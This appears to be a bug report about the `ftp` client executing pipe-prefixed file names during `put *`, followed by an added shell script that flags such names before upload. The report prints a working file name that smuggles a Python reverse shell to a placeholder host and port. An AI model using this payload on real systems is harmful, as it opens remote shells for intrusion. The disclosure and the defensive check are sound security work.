I've found that with a certain file name, `ftp` executes code in the file
name. The file is created with the following command:

```
touch "|python3 -c 'import
os,pty,socket;s=socket.socket();s.connect((\"YOUR_IP\",YOUR_PORT));[os.dup2(s.fileno(),f)for
f in(0,1,2)];pty.spawn(\"sh\")';echo .csv"
```

To get code to execute, simply have the file in the current directory
(haven't tested with multiple files in the directory) and run `put *` to
upload everything.

This bug was found while I was doing a CTF (capture the flag) challenge and
I haven't been able to connect to the same server since for further testing.
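
A defensive pre-upload check for the behaviour reported above, as an added example that is not part of the original message or of the `ftp` source. It assumes the classic `ftp` client naming convention, in which a local file name beginning with `|` is run as a shell command and `-` means standard input; `is_risky_name` and `scan_dir` are hypothetical helper names.

```shell
#!/bin/sh
# Added example: refuse a wildcard upload when the directory holds names that
# an ftp client would not treat as plain files.
# Assumption: the client follows the classic ftp naming convention
# ("|..." is passed to the shell as a command, "-" means stdin/stdout).

# is_risky_name NAME -> status 0 if NAME must not be handed to ftp as-is
is_risky_name() {
    case $1 in
        '|'*) return 0 ;;   # would be executed as a command, not opened
        -)    return 0 ;;   # would be read from standard input
    esac
    return 1
}

# scan_dir [DIR] -> status 0 if DIR is safe for "put *" / "mput *",
# status 1 otherwise; each offending name is reported on stderr.
scan_dir() {
    dir=${1:-.}
    found=0
    for path in "$dir"/*; do
        # Skip the literal pattern left behind when the glob matches nothing.
        [ -e "$path" ] || [ -L "$path" ] || continue
        name=${path##*/}
        if is_risky_name "$name"; then
            found=$((found + 1))
            # Replace non-printable bytes (newlines included) so a hostile
            # name cannot forge extra lines in the report.
            printf 'risky file name: ' >&2
            printf '%s' "$name" | LC_ALL=C tr -c '[:print:]' '?' >&2
            printf '\n' >&2
        fi
    done
    [ "$found" -eq 0 ]
}

# Typical use in a wrapper script: run the upload only when the scan passes,
# e.g.  scan_dir /path/to/outgoing || exit 1
```
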